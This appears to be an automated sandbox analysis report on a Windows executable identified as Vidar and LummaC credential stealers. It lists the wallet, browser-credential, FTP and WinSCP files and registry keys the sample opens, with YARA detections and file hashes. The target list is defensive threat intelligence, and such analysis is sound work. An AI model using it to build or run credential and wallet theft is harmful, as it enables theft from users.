Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90C40 sqlite3_bind_zeroblob,	3_2_6CD90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90D60 sqlite3_bind_parameter_name,	3_2_6CD90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB8EA0 sqlite3_clear_bindings,	3_2_6CCB8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6CD90B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB6410 bind,WSAGetLastError,	3_2_6CCB6410

Windows Analysis Report
f1r6P3j3g7.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1528299
Product:	CloudBasic
Start time:	18:42:07
Start date:	07.10.2024
Sample:	f1r6P3j3g7.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8351aa212d7278c381ebe13f2a435ad9
SHA1:	d529652f0ba92febad36c66a1b5be4398eddaef2
SHA256:	a86c7b65a6348d392d10d3982b6d0b896fdf646b218903a012d3c0dd73159f5b
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\BGIJDGCAEBFI\AFIDGD	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\BGIJDGCAEBFI\BGIJDG	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\BGIJDGCAEBFI\BGIJDG-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\BGIJDGCAEBFI\DAKEBA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\BGIJDGCAEBFI\EBFBKF	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\BGIJDGCAEBFI\ECGIII	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\BGIJDGCAEBFI\EHCGIJ	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\BGIJDGCAEBFI\GIIEGH	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\BGIJDGCAEBFI\HJEHIJ	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\BGIJDGCAEBFI\HJEHIJ-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\BGIJDGCAEBFI\JKECFC	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\KEGIDHJKKJ.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8E704ACD1B0C26FDCFD0374D57FCB28E	157B61A24087521693C8ACA743D60E4C33CB803D	6C7818A65F46711FBC89CD7B548829E98BE247FAB8B2C4766C85B64BC632E797
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KEGIDHJKKJ.exe_5d48e568e7ddaed7c715c34ba7d8a94937a0f9_bcd0fe0f_18242657-267c-46a5-87ff-84750f054ab7\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	BC455E5EE4B5060CCDEFE3FCFA261272	60B4E90DD14199BB1657F30A7922AE3A527BDFDE	A083FEF5534E308BE0E76AAB75F43E3D3560A6EC1D4655E8AA1D6FA0A1C27E93
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_43832d93ddcf66f1edc5babbb1e353ebb92236_05bdfb8c_cc67cea2-f6cd-451e-b7c7-aa0c52bc58ac\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	DB6F579A463701193A383B4902CBF736	FD07C1444E676B75EF47DA598358578542E8E941	0805D3082A4099A512C88380B9E6B335C0F7784AD7BE2EA456B504D8EB149013
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_f1r6P3j3g7.exe_b95f3ae3b15bcd5a4383aa615a5f42f59835b9_234f6c94_fda499e8-cf30-46d3-9443-7513842412cb\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	88BD69B3B3BD1FCAE8F1A0C8070F8DE3	F621FEFD741D4F9929F604CBECDF19E20EA9895D	EA90D5D9507C2CDFA338F87012536ABE7731CC57C20D82D00387C9FEF3B2BF1C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A2.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 16:43:49 2024, 0x1205a4 type	13C1AE2CC31D321B1018903A93CA94F0	A231478882CCD5B57DB67F8684038F55DF5CABF1	63B18F14D52502433D19C474C08412DD1D2F7B6C872AE0D3E5BBB5424BEB80CB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1859.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	066E640872E001C8DD4C12462C7EBBCA	CC35A3441C15346E4ECE2303AF06A4D0806079B2	ECCD28A8FB111ACC500353526EE37C86B38DB39F93E5C6F7E81961D3ECBC1B68
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1889.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	6053A8303950D094774BD0B260342D0A	C8F7332753826B9AB1E77CB9281F63F478EF0546	4EBCD8662674713593AD1CDEAC5E442F44C7464951DBFBB5895EE1BDF01CE2B3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5074.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 16:42:58 2024, 0x1205a4 type	6900C85F5526E4EA5AB0F36B6C3DC11E	2DE2F5EDBA3C08E85246BCC19B35DD05F902F872	C1FF189F96B92295FC2C4576B71478D5B0EB0BC360ADCD4B4F307666FD13D2A9
C:\ProgramData\Microsoft\Windows\WER\Temp\WER50C3.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	9B6D7C69B6E07C6C7509CEC71DD39787	B93D229625EE8191D6EE22AF88E246AAC2C5AA40	35FEE08934C2685090E39387A55F098A0C78C429FF634F398C0E93B3F70804F1
C:\ProgramData\Microsoft\Windows\WER\Temp\WER50F3.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	E3361CD7A13C67AA277EF6BF053822BC	0C7768517B559F20C7FD545B8579E26373C31F27	F75AFC86AD503AE281EE46F5FFA42C05C83650378EF745D260A965E4C9729024
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71.tmp.dmp	Mini DuMP crash report, 14 streams, Mon Oct 7 16:43:46 2024, 0x1205a4 type	4B0AE5EE47BAE784147253B359210314	86F6370B7242FB1EB583C3A73A4EF995349329CF	5C2FD4CF34C4C7C69B96439944A72E60CDCCFF19CAB0E033703EE30DD9F52EA0
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	35251AB8F63F0620DCB4228E2DDA49C2	7CC1B63B296359DF2A653B454264402C77F050D1	8F898DB907A3FD51234E2D4B92AAE96186A60E2CDFA9D75818209F69C4508BED
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD1.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	2DEDBB736D1FE9C6238DA4275461F51F	18DD733A304827D9546FFAD980DE7519FFF180B6	4931E0B0269F8BF9B0B62F0987864A3DB56D528D3BC1747E22F76F8E68BB165B
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
